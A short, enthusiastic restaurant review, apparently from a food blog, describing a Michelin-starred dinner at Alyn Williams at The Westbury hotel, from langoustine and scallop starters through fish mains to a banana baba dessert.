There’s a lot of hype around a certain restaurant in The Westbury hotel at the moment, Brasserie Chavot – you may have heard of it. Bur let’s not forget the other restaurant located in the hotel, which may not be new but is still dishing out top notch, posh nosh.

Alyn Williams at The Westbury opened in 2011 and has recently been awarded a Michelin Star and 3 AA Rosettes. The dining room is spacious with dim lighting, the decor nods to glamour from days gone by but with a serious atmosphere and uber efficient service it’s very clearly a fine dining experience.

Dinner starts with some surprises from the chef which we followed up with Western isles langoustine, finger lime, cracked wheat and spiced carrot. Beautifully presented with delicate flavours and contrasting textures the dish was over way too soon. Vacherin Orkney scallops, Tandoori, chickpeas, yoghurt, aubergine, cucumber was another great dish, the juicy scallops came with just enough additional flavours to ensure the shellfish taste wasn’t lost beneath.

Mains were equally as pleasing on the eye and mouth, Guernsey sea bass, grilled lobster, lemon gnocchi and beach vegetables was well thought out, textures and flavours paired together in a way Cilla Black can only dream about. Whilst Cornish brill, ramsons, charred cauliflower and oyster mayo might just have been our favourite dish.

We ended with a Banana Baba which was kindly prepared out our table by the waiter with the cockney accent, who we kind of fell in love with… The dessert was pretty punch,  a banana muffin style cake served with rum cream and caramelised Banana ice-cream. A box of intense chocolate truffles followed and it was job done. We’ll be back.
